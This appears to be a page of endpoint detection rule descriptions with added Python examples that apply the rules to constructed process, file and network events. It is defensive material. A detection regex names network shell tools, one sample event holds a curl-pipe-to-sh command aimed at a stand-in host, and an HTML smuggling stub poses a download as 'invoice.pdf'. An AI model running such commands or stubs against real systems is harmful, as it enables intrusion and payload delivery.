Suspicious Emond Child Process
Identifies the execution of a suspicious child process of the Event Monitor Daemon (emond). Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.
Suspicious Endpoint Security Parent Process
A suspicious Endpoint Security parent process was detected. This may indicate process hollowing or another form of code injection into the security agent's process tree.
Suspicious Execution from a Mounted Device
Identifies a script interpreter or signed binary launched with a non-standard working directory, such as a mounted device. An attacker may use this technique to evade defenses that key on the usual execution paths.
Suspicious Execution from a WebDav Share
Identifies attempts to execute Windows scripts from a remote WebDAV share. Adversaries may abuse this method to avoid dropping malicious files on the victim file system.
Suspicious Execution from Foomatic-rip or Cupsd Parent
This rule covers the chain of CUPS printing system vulnerabilities CVE-2024-47176, CVE-2024-47076, CVE-2024-47175 and CVE-2024-47177 by detecting suspicious command lines executed by child processes of foomatic-rip and cupsd. These flaws affect cups-browsed, libcupsfilters, libppd and foomatic-rip and allow a remote, unauthenticated attacker to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing, resulting in arbitrary command execution when a print job is initiated.
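The emond and foomatic-rip/cupsd entries above are both instances of the same parent/child lineage pattern: a daemon that should almost never spawn a shell or network tool is seen doing so. The following is an added example written for this page, not the published rules' query logic, that applies both rules to a handful of constructed process-exec events with ECS-style field names. The command-line pattern list and the emond child list are assumptions chosen for the example, and the hostname in the sample events is made up.

```python
"""Added example (not Elastic's rule source): a minimal parent/child process
lineage detector shaped like the emond and foomatic-rip/cupsd rules.
Field names follow ECS conventions; every event below is constructed."""
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional

# Command-line fragments a print filter has no business running. The list is an
# assumption for this example, not the published rule's pattern list.
SUSPICIOUS_CMDLINE = re.compile(
    r"\b(?:curl|wget|nc|ncat|socat|base64)\b"   # download / reverse-shell tooling
    r"|/dev/tcp/"                                # bash network redirection
    r"|/etc/(?:cron|rc\.local|init\.d)"          # persistence locations
)


@dataclass(frozen=True)
class LineageRule:
    name: str
    parents: FrozenSet[str]                  # parents that rarely spawn anything interesting
    children: FrozenSet[str] = frozenset()   # child names flagged on sight (emond style)
    cmdline: Optional[re.Pattern] = None     # or a regex over the child's command line (CUPS style)


RULES = (
    LineageRule(
        "Suspicious Emond Child Process",
        parents=frozenset({"emond"}),
        children=frozenset({"bash", "sh", "zsh", "python", "python3", "perl",
                            "osascript", "curl", "nscurl"}),
    ),
    LineageRule(
        "Suspicious Execution from Foomatic-rip or Cupsd Parent",
        parents=frozenset({"foomatic-rip", "cupsd"}),
        cmdline=SUSPICIOUS_CMDLINE,
    ),
)


def evaluate(event: Dict) -> List[str]:
    """Return the names of the rules that one process-exec event matches."""
    if event.get("event.action") != "exec":
        return []
    parent = event.get("process.parent.name", "")
    child = event.get("process.name", "")
    command_line = " ".join(event.get("process.args", []))
    hits = []
    for rule in RULES:
        if parent not in rule.parents:
            continue
        if child in rule.children or (rule.cmdline and rule.cmdline.search(command_line)):
            hits.append(rule.name)
    return hits


# Constructed sample telemetry: a benign print job (foomatic-rip running the
# Ghostscript renderer is normal), a CUPS exploitation chain, an emond-triggered
# shell, and unrelated launchd activity.
SAMPLE_EVENTS = [
    {"id": "e1", "event.action": "exec", "process.parent.name": "foomatic-rip",
     "process.name": "gs",
     "process.args": ["gs", "-q", "-dNOPAUSE", "-sDEVICE=pdfwrite", "-sOutputFile=-", "-"]},
    {"id": "e2", "event.action": "exec", "process.parent.name": "foomatic-rip",
     "process.name": "sh",
     "process.args": ["sh", "-c", "curl -s http://printer-update.invalid/p | sh"]},
    {"id": "e3", "event.action": "exec", "process.parent.name": "emond",
     "process.name": "bash", "process.args": ["bash", "/Library/Scripts/update.sh"]},
    {"id": "e4", "event.action": "exec", "process.parent.name": "launchd",
     "process.name": "cupsd", "process.args": ["/usr/sbin/cupsd", "-l"]},
]


def scan(events=SAMPLE_EVENTS) -> Dict[str, List[str]]:
    """Map each event id to the rules it triggered (empty list means no alert)."""
    return {e["id"]: evaluate(e) for e in events}


if __name__ == "__main__":
    for event_id, rules in scan().items():
        print(event_id, rules or "-")
```

The benign event e1 matters as much as the malicious ones: foomatic-rip legitimately spawns a renderer (and a shell to run the PPD's command line), so a rule that fires on "foomatic-rip spawned a shell" alone would be noisy; keying on what the child does, as the published rule does, is what keeps the alert actionable.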
Suspicious Execution from INET Cache
Identifies the execution of a process with arguments pointing to the INetCache folder. Adversaries may deliver malicious content via WinINet during initial access, leaving the payload in that cache before it is executed.
Suspicious Execution from VS Code Extension
Detects suspicious process execution launched from a VS Code extension context (the parent command line contains .vscode/extensions). Malicious extensions can run on startup and drop or execute payloads (e.g. remote access tools such as ScreenConnect, script interpreters, or download utilities). The rule covers both script/LOLBin children and recently created executables launched from paths outside Program Files, as seen in campaigns such as the fake Clawdbot extension that installed the ScreenConnect RAT.
Suspicious Execution via Microsoft Office Add-Ins
Identifies common Microsoft Office applications launching an Office Add-In from a suspicious path or with an unusual parent process. This may indicate an attempt to gain initial access via a malicious MS Office Add-In delivered by phishing.
Suspicious Execution via Scheduled Task
Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage.
Suspicious Execution via Windows Subsystem for Linux
Detects Linux Bash commands executed through the Windows Subsystem for Linux. Adversaries may enable and use WSL to run tooling outside the view of Windows-focused monitoring.
Suspicious Execution with NodeJS
Identifies suspicious execution patterns involving the NodeJS interpreter, based on process path and arguments.
Suspicious Explorer Child Process
Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process.
Suspicious File Creation via Kworker
This rule monitors for a file creation event originating from a kworker parent process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process.
Suspicious File Creation via Pkg Install Script
Detects when an installer package executes a pre or post install script that immediately copies a file to suspicious locations on the filesystem. This activity is not common and usually indicates a malicious package attempting to install persistence or establish a working directory for malware.
Suspicious File Downloaded from Google Drive
Identifies suspicious file download activity from a Google Drive URL. This could indicate an attempt to deliver phishing payloads via a trusted web service.
Suspicious File Made Executable via Chmod Inside A Container
This rule detects when chmod is used to add the execute permission to a file in a world-writable directory inside a container; chown activity on such files is monitored as well. Modifying file permissions to make a file executable could indicate malicious activity, as an attacker may attempt to run unauthorized or malicious code inside the container.
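Deciding whether a chmod call actually grants execute is less trivial than grepping for "+x": the mode may be octal (755), symbolic with classes (u+x, go=rx), comma-separated (u+x,go-w), or a removal (-x) that happens to contain an x. The following added example, written for this page rather than taken from the published rule, parses a chmod argv from a constructed container exec event and reports the world-writable targets it makes executable. The world-writable directory list and the container field name are assumptions for the example.

```python
"""Added example (not the published rule): decide whether a chmod seen inside a
container grants execute permission to a file in a world-writable directory.
Events are constructed; field names follow ECS (process.args, container.id)."""
import os
import re
from typing import Dict, List, Optional, Tuple

# Directories that are world-writable on a stock image. An assumption for the
# example; the published rule's list may differ.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

_OCTAL = re.compile(r"^[0-7]{3,4}$")
_SYMBOLIC = re.compile(r"^([ugoa]*)([+=-])([rwxXst]*)$")


def mode_adds_execute(mode: str) -> bool:
    """True if a chmod mode argument can set any execute bit.

    Octal: any of the three x bits (0o111) set. Symbolic: a '+' or '=' clause
    whose permission letters include x or X (X = execute if directory or
    already executable). Copy-from-class forms such as 'go=u' are not modelled.
    """
    if _OCTAL.match(mode):
        return (int(mode, 8) & 0o111) != 0
    for clause in mode.split(","):
        m = _SYMBOLIC.match(clause)
        if m and m.group(2) in "+=" and (set("xX") & set(m.group(3))):
            return True
    return False


def parse_chmod(args: List[str]) -> Optional[Tuple[str, List[str]]]:
    """Split a chmod argv into (mode, targets); None if this is not a usable chmod call."""
    if not args or args[0].rsplit("/", 1)[-1] != "chmod":
        return None
    # Options such as -R or --silent start with '-' and are not valid modes;
    # a mode like '-x' also starts with '-' but matches the symbolic grammar.
    positional = [a for a in args[1:] if not a.startswith("-") or _SYMBOLIC.match(a)]
    if len(positional) < 2:
        return None
    return positional[0], positional[1:]


def evaluate(event: Dict) -> List[str]:
    """Normalised targets in world-writable dirs that this event makes executable inside a container."""
    if not event.get("container.id"):
        return []                                  # rule scope: containers only
    parsed = parse_chmod(event.get("process.args", []))
    if parsed is None:
        return []
    mode, targets = parsed
    if not mode_adds_execute(mode):
        return []
    cwd = event.get("process.working_directory", "/")
    # Resolve relative targets against the recorded cwd and collapse '..' so
    # '/tmp/../usr/bin/x' is not mistaken for a /tmp file.
    resolved = [os.path.normpath(os.path.join(cwd, t)) for t in targets]
    return [p for p in resolved if p.startswith(WORLD_WRITABLE_DIRS)]


# Constructed sample events covering the edge cases described above.
SAMPLE_EVENTS = [
    {"id": "c1", "container.id": "abc123", "process.args": ["/bin/chmod", "+x", "/tmp/.x"]},
    {"id": "c2", "container.id": "abc123", "process.args": ["chmod", "644", "/tmp/app.conf"]},
    {"id": "c3", "container.id": "abc123", "process.args": ["chmod", "755", "/app/bin/run"]},
    {"id": "c4", "container.id": None, "process.args": ["chmod", "+x", "/tmp/t"]},
    {"id": "c5", "container.id": "abc123", "process.args": ["chmod", "-R", "u+x,go-w", "/dev/shm/payload"]},
    {"id": "c6", "container.id": "abc123", "process.args": ["chmod", "-x", "/tmp/z"]},
    {"id": "c7", "container.id": "abc123", "process.working_directory": "/tmp",
     "process.args": ["chmod", "a+rx", "dropper"]},
    {"id": "c8", "container.id": "abc123", "process.args": ["chmod", "+x", "/tmp/../usr/bin/x"]},
]


def scan(events=SAMPLE_EVENTS) -> Dict[str, List[str]]:
    """Map each event id to the flagged targets (empty list means no alert)."""
    return {e["id"]: evaluate(e) for e in events}


if __name__ == "__main__":
    for event_id, targets in scan().items():
        print(event_id, targets or "-")
```

Event c7 is the case a naive rule misses: the path argument is relative, and only joining it with the recorded working directory reveals that the file lives in /tmp. Event c8 is the opposite trap, where a literal "/tmp/" prefix does not mean the file is in /tmp.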
Suspicious File Renamed via SMB
Identifies an incoming SMB connection followed by a suspicious file rename operation. This may indicate a remote ransomware attack via the SMB protocol.
Suspicious Hidden Child Process of Launchd
Identifies launchd spawning a child process whose executable is a hidden (dot-prefixed) file. An adversary can establish persistence by installing a new login item, launch agent, or launch daemon that executes upon login, and hiding the backing binary makes it less likely to be noticed.
Suspicious HTML File Creation
Identifies the execution of a browser process to open an HTML file with high entropy and large size. Adversaries may smuggle data and files past content filters by hiding malicious payloads inside seemingly benign HTML files.
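The size-and-entropy heuristic behind the HTML smuggling rule works because an HTML page carrying an encoded payload is dominated by a base64 (or similar) blob whose byte distribution is far flatter than English text and markup. The following added example, not taken from the published rule, computes Shannon entropy over the bytes of two constructed HTML files, one plain and one carrying the classic atob-to-Blob download stub, and classifies them. The thresholds, the sample page contents and the random payload are all assumptions chosen for the example.

```python
"""Added example (not the published rule): the size-and-entropy test behind the
HTML smuggling detection, applied to two constructed HTML files."""
import base64
import math
import random
from collections import Counter
from typing import Dict, Tuple

MIN_SIZE_BYTES = 4096     # assumption: smaller pages cannot carry a useful payload
ENTROPY_THRESHOLD = 5.5   # bits/byte; English-language HTML sits near 4.5, pure base64 near 6.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, computed from the byte histogram."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_like_smuggling(html: bytes) -> bool:
    """Flag a file that is both large and unusually high-entropy for HTML."""
    return len(html) >= MIN_SIZE_BYTES and shannon_entropy(html) >= ENTROPY_THRESHOLD


# Constructed benign page: markup plus repeated English prose.
BENIGN_HTML = (
    "<!doctype html><html><head><title>Quarterly update</title></head><body><h1>Notes</h1>"
    + "<p>The team shipped the new build and closed the remaining tickets this week.</p>" * 40
    + "</body></html>"
).encode()

# Constructed smuggling page: a JS stub that decodes a large base64 blob in the
# browser and triggers a download. The payload is seeded random bytes standing
# in for a packed or encrypted executable.
_rng = random.Random(1234)
_payload = bytes(_rng.getrandbits(8) for _ in range(6000))
_blob = base64.b64encode(_payload).decode()
SMUGGLED_HTML = (
    "<!doctype html><html><body><script>"
    "const b = atob('" + _blob + "');"
    "const u = Uint8Array.from(b, c => c.charCodeAt(0));"
    "const a = document.createElement('a');"
    "a.href = URL.createObjectURL(new Blob([u], {type: 'application/octet-stream'}));"
    "a.download = 'invoice.pdf'; a.click();"
    "</script></body></html>"
).encode()


def report() -> Dict[str, Tuple[int, float, bool]]:
    """(size, entropy, flagged) for each sample, so the two can be compared side by side."""
    out = {}
    for name, html in (("benign", BENIGN_HTML), ("smuggled", SMUGGLED_HTML)):
        out[name] = (len(html), round(shannon_entropy(html), 3), looks_like_smuggling(html))
    return out


if __name__ == "__main__":
    for name, (size, entropy, flagged) in report().items():
        print(f"{name:9s} size={size:6d} entropy={entropy:.3f} flagged={flagged}")
```

The false-positive class to expect is legitimate pages with large inline data URIs (embedded images or fonts), which are also big and base64-heavy; in practice the rule is paired with the browser-opening-a-local-file context described above rather than applied to every HTML file on disk.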
Suspicious Image Load (taskschd.dll) from MS Office
Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks.
Suspicious ImagePath Service Creation
Identifies the creation of a Windows service whose ImagePath registry value (the path to the binary the service runs) is suspicious. This could indicate an adversary attempting to stealthily persist or escalate privileges through abnormal service creation.
Suspicious Installer Package Spawns Network Event
Detects the execution of a macOS installer package with an abnormal child process (e.g. bash) followed immediately by a network connection from a suspicious process (e.g. curl). Threat actors build and distribute malicious macOS installer packages (.pkg files), often imitating legitimate software to persuade victims to install them, and use the package's pre/post install scripts to download additional tools or malware. If this rule fires it should indicate the installation of a malicious or suspicious package.
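The SMB rename rule above and this installer package rule share a structure that differs from the single-event rules elsewhere on this page: a first-stage event must be followed by a second-stage event on the same host within a short window. The following added example, written for this page rather than taken from either published rule or from any EQL engine, implements that "A then B within N seconds, joined on a key" correlator and runs both rules over a constructed, ECS-style event stream. The predicates, the one-second and thirty-second windows, the join on host.id and the file.original.name field are assumptions for the example.

```python
"""Added example (not Elastic's EQL engine or rule source): a small
"A followed by B within N seconds" correlator for the SMB-rename and
installer-package rules. Field names are ECS-like; all events are constructed."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

Event = Dict[str, object]


@dataclass(frozen=True)
class Sequence:
    name: str
    first: Callable[[Event], bool]   # stage 1 predicate
    then: Callable[[Event], bool]    # stage 2 predicate
    join_key: str                    # field both stages must share (here host.id)
    max_span_s: float                # seconds allowed between the two stages


def correlate(events: List[Event], seq: Sequence) -> List[Tuple[str, str]]:
    """Return (first_id, then_id) pairs for every completed sequence.

    Events are processed in timestamp order. Each stage-1 event is buffered per
    join key until it expires or a stage-2 event consumes it (oldest first).
    The stage-2 check runs before the stage-1 check so an event never pairs with itself.
    """
    pending: Dict[object, List[Event]] = {}
    matches: List[Tuple[str, str]] = []
    for ev in sorted(events, key=lambda e: e["@timestamp"]):
        key = ev.get(seq.join_key)
        if key is None:
            continue
        now = ev["@timestamp"]
        live = [p for p in pending.get(key, []) if now - p["@timestamp"] <= seq.max_span_s]
        if live and seq.then(ev):
            matches.append((live.pop(0)["id"], ev["id"]))
        if seq.first(ev):
            live.append(ev)
        pending[key] = live
    return matches


SHELLS = {"bash", "sh", "zsh", "python", "python3", "osascript"}
NET_TOOLS = {"curl", "nscurl", "python", "python3", "osascript"}


def _ext(name) -> str:
    return str(name or "").rsplit(".", 1)[-1].lower()


INSTALLER_THEN_NETWORK = Sequence(
    name="Suspicious Installer Package Spawns Network Event",
    first=lambda e: e.get("event.category") == "process"
        and e.get("process.parent.name") == "installer"
        and e.get("process.name") in SHELLS,
    then=lambda e: e.get("event.category") == "network"
        and e.get("process.name") in NET_TOOLS,
    join_key="host.id", max_span_s=30,
)

SMB_THEN_RENAME = Sequence(
    name="Suspicious File Renamed via SMB",
    first=lambda e: e.get("event.category") == "network"
        and e.get("network.direction") == "ingress"
        and e.get("destination.port") == 445
        and not str(e.get("source.ip", "")).startswith("127."),
    then=lambda e: e.get("event.category") == "file"
        and e.get("event.action") == "rename"
        and e.get("process.pid") == 4   # Windows System process: remote SMB file ops are attributed here
        and _ext(e.get("file.name")) != _ext(e.get("file.original.name")),
    join_key="host.id", max_span_s=1,
)

# Constructed event stream; timestamps are epoch seconds.
SAMPLE_EVENTS: List[Event] = [
    # h1 (macOS): installer runs a postinstall shell, which fetches a second stage 5s later
    {"id": "p1", "@timestamp": 100.0, "host.id": "h1", "event.category": "process",
     "process.parent.name": "installer", "process.name": "bash"},
    {"id": "n1", "@timestamp": 105.0, "host.id": "h1", "event.category": "network",
     "process.name": "curl", "network.direction": "egress", "destination.port": 443},
    # h2 (Windows): inbound SMB session, then System renames a document to a new extension
    {"id": "n2", "@timestamp": 200.0, "host.id": "h2", "event.category": "network",
     "network.direction": "ingress", "destination.port": 445, "source.ip": "10.0.0.5", "process.name": "System"},
    {"id": "f1", "@timestamp": 200.4, "host.id": "h2", "event.category": "file", "event.action": "rename",
     "process.pid": 4, "file.original.name": "report.docx", "file.name": "report.docx.locked"},
    # h2: a later rename that keeps its extension and has no SMB session within 1s
    {"id": "f2", "@timestamp": 250.0, "host.id": "h2", "event.category": "file", "event.action": "rename",
     "process.pid": 4, "file.original.name": "old.docx", "file.name": "new.docx"},
    # h3: both stages present but 10s apart, outside the allowed span
    {"id": "n3", "@timestamp": 300.0, "host.id": "h3", "event.category": "network",
     "network.direction": "ingress", "destination.port": 445, "source.ip": "10.0.0.9", "process.name": "System"},
    {"id": "f3", "@timestamp": 310.0, "host.id": "h3", "event.category": "file", "event.action": "rename",
     "process.pid": 4, "file.original.name": "a.xlsx", "file.name": "a.xlsx.locked"},
]


def run_all(events: List[Event] = SAMPLE_EVENTS) -> Dict[str, List[Tuple[str, str]]]:
    """Run both sequences and map rule name to the matched (first_id, then_id) pairs."""
    return {seq.name: correlate(events, seq) for seq in (INSTALLER_THEN_NETWORK, SMB_THEN_RENAME)}


if __name__ == "__main__":
    for name, pairs in run_all().items():
        print(name, pairs or "-")
```

Host h3 shows why the window matters: the same two stages appear, but ten seconds apart, so the rename is not attributed to the SMB session. Real ransomware over SMB renames files in tight bursts right after the session opens, which is what makes a one-second window defensible without drowning in file-server noise.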
Suspicious Inter-Process Communication via Outlook
Detects inter-process communication with Outlook via the Component Object Model from an unusual process. Adversaries may target user email to collect sensitive information or to send email on the user's behalf through this API.
Suspicious Interpreter Execution Detected via Defend for Containers
This rule detects when an interactive process executes a suspicious interpreter command inside a container. These commands are commonly used by attackers to execute malicious code or exfiltrate data.